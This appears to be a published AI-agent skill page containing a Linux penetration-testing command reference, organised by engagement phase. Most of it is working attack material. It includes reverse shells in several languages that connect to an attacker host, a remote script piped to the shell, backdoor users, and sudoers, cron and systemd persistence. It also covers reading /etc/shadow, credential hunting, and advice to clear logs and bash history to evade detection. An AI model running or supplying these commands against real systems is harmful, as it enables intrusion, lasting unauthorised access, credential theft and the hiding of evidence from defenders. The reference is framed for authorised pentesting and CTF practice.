linux-pentester-practical-commands

star 1

Practical Linux command reference and techniques for penetration testing operations covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation

Aradotso By Aradotso schedule Updated 6/9/2026
play_arrow Run Skill in Manus View GitHub

name: linux-pentester-practical-commands description: Practical Linux command reference and techniques for penetration testing operations covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation triggers: - how do I use linux commands for pentesting - show me reconnaissance commands for linux - what are common privilege escalation techniques on linux - help me enumerate services on a linux target - how to perform post exploitation on linux systems - what commands do pentesters use for linux enumeration - show me practical linux exploitation commands - help with linux penetration testing workflow

Linux Pentester Practical Commands

Skill by ara.so — Security Skills collection.

Overview

Linux for a Pentester is a curated collection of practical penetration testing commands and techniques organized by engagement phase. This resource provides real-world command-line operations used during security assessments, CTFs, and penetration testing exercises on Linux systems.

The repository is structured around the penetration testing kill chain: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.

Installation

This is a reference repository, not a software package. Clone it for local reference:

git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester

Keep it accessible during engagements:

# Add to your path or create an alias
alias pentref='cd ~/tools/Linux-for-a-Pentester && ls'

# Or use it via grep for quick lookups
grep -r "find.*suid" ~/tools/Linux-for-a-Pentester/

Repository Structure

The repository is organized into six main modules:

  • 00-General-Commands: Basic Linux survival commands
  • 01-Recon: Local and network reconnaissance
  • 02-Enumeration: Service and user enumeration
  • 03-Exploitation: Initial access techniques
  • 04-Privilege-Escalation: Escalation to root/admin
  • 05-Post-Exploitation: Persistence and lateral movement
  • Cheatsheets: Quick reference one-liners

Key Command Categories

Reconnaissance Commands

Network and system discovery during initial access:

# Network interface enumeration
ip addr
ip a show
ifconfig -a

# Routing table inspection
ip route
route -n
netstat -rn

# Active connections and listening ports
ss -tunlp
netstat -tunlp
lsof -i

# ARP cache inspection
ip neigh
arp -a

# DNS enumeration
cat /etc/resolv.conf
cat /etc/hosts

# Firewall rules
iptables -L -n -v
nft list ruleset

# Running processes
ps aux
ps -ef
pstree -p

# System information
uname -a
cat /etc/os-release
lsb_release -a
hostnamectl

Enumeration Techniques

Deep enumeration for privilege escalation vectors:

# User enumeration
id
whoami
groups
cat /etc/passwd
cat /etc/shadow  # if accessible
cat /etc/group

# SUID/SGID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
find / -perm -6000 -type f 2>/dev/null

# Writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null

# World-writable files
find / -perm -2 -type f 2>/dev/null

# Files owned by current user
find / -user $(whoami) 2>/dev/null

# Sudo permissions
sudo -l

# Capabilities
getcap -r / 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*

# Service enumeration
systemctl list-units --type=service
service --status-all

# Listening services with PIDs
ss -tlnp
netstat -tlnp

# Environment variables
env
cat /proc/*/environ 2>/dev/null | tr '\0' '\n'

# Mounted filesystems
mount
cat /etc/fstab
df -h

# SSH keys
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
ls -la ~/.ssh/

Exploitation Techniques

Common exploitation patterns during pentests:

# Reverse shell - Bash
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'

# Reverse shell - Netcat
nc -e /bin/bash $ATTACKER_IP 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4444 >/tmp/f

# Reverse shell - Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

# Reverse shell - PHP
php -r '$sock=fsockopen("$ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Upgrade to interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Then background with Ctrl+Z and run:
# stty raw -echo; fg
# export TERM=xterm

# File transfer - Wget
wget http://$ATTACKER_IP:8000/file -O /tmp/file

# File transfer - Curl
curl http://$ATTACKER_IP:8000/file -o /tmp/file

# File transfer - Base64
echo "base64_encoded_content" | base64 -d > /tmp/file

# Simple HTTP server for exfil
python3 -m http.server 8000

Privilege Escalation Vectors

Common privilege escalation techniques:

# SUID binary exploitation example - cp
# If cp has SUID bit
/usr/bin/cp /etc/shadow /tmp/shadow.bak
# Then crack or read

# GTFOBins - Find
# If find has SUID
find . -exec /bin/bash -p \; -quit

# Sudo exploitation - less
# If sudo less is allowed
sudo less /etc/profile
# Then type: !/bin/bash

# Sudo exploitation - vim
# If sudo vim is allowed
sudo vim -c ':!/bin/bash'

# Writable /etc/passwd exploitation
openssl passwd -1 -salt xyz password
echo 'hacker:$1$xyz$hash:0:0:root:/root:/bin/bash' >> /etc/passwd

# Path hijacking
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH

# LD_PRELOAD exploitation
# Create evil.c
gcc -fPIC -shared -o /tmp/evil.so evil.c -nostartfiles
sudo LD_PRELOAD=/tmp/evil.so program

# Cron job hijacking
# If writable cron script exists
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cronjob.sh

# Kernel exploits
uname -a
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"

# Docker escape
# If user in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Check for automated enumeration scripts
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Exploit Suggester
./linux-exploit-suggester.sh

Post-Exploitation Activities

Maintaining access and lateral movement:

# Add SSH key for persistence
mkdir -p /root/.ssh
echo "ssh-rsa YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

# Create backdoor user
useradd -m -s /bin/bash backdoor
echo 'backdoor:password' | chpasswd
usermod -aG sudo backdoor

# Add to sudoers
echo 'backdoor ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers

# Cron persistence
(crontab -l ; echo "@reboot /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'") | crontab -

# Service persistence
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'
Restart=always

[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service

# Password hash extraction
cat /etc/shadow | grep -v '*' | grep -v '!'

# History clearing
history -c
rm ~/.bash_history
ln -s /dev/null ~/.bash_history

# Log clearing
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
echo "" > ~/.bash_history

# Find interesting files
find / -name "*.conf" 2>/dev/null | grep -v proc
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
find / -name "*.db" 2>/dev/null

# Credential hunting
grep -r "password" /etc/ 2>/dev/null
grep -r "PASS" /var/www/ 2>/dev/null
grep -r "DB_PASSWORD" /var/www/ 2>/dev/null

# Network pivoting with SSH
ssh -L 8080:internal_server:80 user@compromised_host
ssh -D 1080 user@compromised_host  # SOCKS proxy

# Port forwarding with socat
socat TCP-LISTEN:8080,fork TCP:internal_server:80

Common Patterns

Initial Foothold Workflow

# 1. Initial reconnaissance
whoami && id && hostname
uname -a
cat /etc/os-release

# 2. Check sudo permissions
sudo -l

# 3. Find SUID binaries
find / -perm -4000 2>/dev/null

# 4. Check writable files
find / -writable -type f 2>/dev/null | grep -v proc

# 5. Check running services
ps aux
ss -tlnp

# 6. Enumerate users
cat /etc/passwd | grep -v nologin | grep -v false

# 7. Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*

Enumeration Script Pattern

#!/bin/bash
# Quick enumeration script

echo "[*] System Information"
uname -a
cat /etc/os-release

echo "[*] Current User"
whoami && id

echo "[*] Sudo Permissions"
sudo -l 2>/dev/null

echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null

echo "[*] Interesting Files"
find / -name "*.conf" -o -name "*.bak" 2>/dev/null | head -20

echo "[*] Network Connections"
ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null

echo "[*] Users with Shell"
cat /etc/passwd | grep -v nologin | grep -v false

Troubleshooting

Limited Shell Issues

If you have a limited shell, try these escape techniques:

# Python pty spawn
python -c 'import pty; pty.spawn("/bin/bash")'

# Echo method
echo os.system('/bin/bash')

# Expect spawn
expect -c 'spawn /bin/bash; interact'

# VI escape
vi
:set shell=/bin/bash
:shell

# AWK escape
awk 'BEGIN {system("/bin/bash")}'

Missing Commands

Some systems may have limited binaries. Alternatives:

# No netcat - use bash
bash -i >& /dev/tcp/$IP/4444 0>&1

# No wget - use curl
curl http://example.com/file -o output

# No curl - use wget
wget http://example.com/file -O output

# No python - use perl
perl -e 'use Socket;$i="$IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

File Transfer Issues

When standard methods fail:

# Base64 encode on attacker, decode on target
cat file | base64 -w 0
# On target:
echo "base64_string" | base64 -d > file

# Using dev/tcp
cat < /dev/tcp/$ATTACKER_IP/80 > file

# Using dd
dd if=/dev/tcp/$ATTACKER_IP/8000 of=/tmp/file

# Using hexdump
xxd -p file | tr -d '\n'
# On target:
echo "hex_string" | xxd -r -p > file

Integration with Pentesting Workflow

This reference is designed to complement automated tools:

# Run automated enumeration
./linpeas.sh | tee linpeas_output.txt

# Cross-reference with manual commands
grep -i "suid" linpeas_output.txt

# Manually verify findings
find / -perm -4000 2>/dev/null | xargs ls -la

# Test exploitation manually
sudo -l  # If linpeas found sudo access

Best Practices

  1. Always stabilize shells immediately after getting initial access
  2. Document all commands executed during engagement for reporting
  3. Check multiple enumeration vectors - automated tools miss things
  4. Verify writable paths before attempting exploitation
  5. Test privilege escalation in isolated environment when possible
  6. Clean up artifacts during post-exploitation phase
  7. Use encryption for sensitive data exfiltration
  8. Maintain operational security - clear logs selectively, not obviously

Reference During Engagement

Quick lookup patterns:

# Quick SUID check
find / -perm -4000 2>/dev/null | grep -E '(vim|nano|find|nmap|python|perl|ruby|bash)'

# Quick sudo check for common escalation vectors
sudo -l 2>/dev/null | grep -E '(vim|nano|find|nmap|less|more|man|awk|python|perl)'

# Quick writable check
find / -writable 2>/dev/null | grep -E '(\.py$|\.sh$|cron|systemd)' | grep -v proc

This skill provides practical, battle-tested Linux commands for penetration testing operations organized by engagement phase.

Install via CLI
npx skills add https://github.com/Aradotso/security-skills --skill linux-pentester-practical-commands
Repository Details
star Stars 1
call_split Forks 0
navigation Branch main
article Path SKILL.md
More from Creator
Aradotso
Aradotso Explore all skills →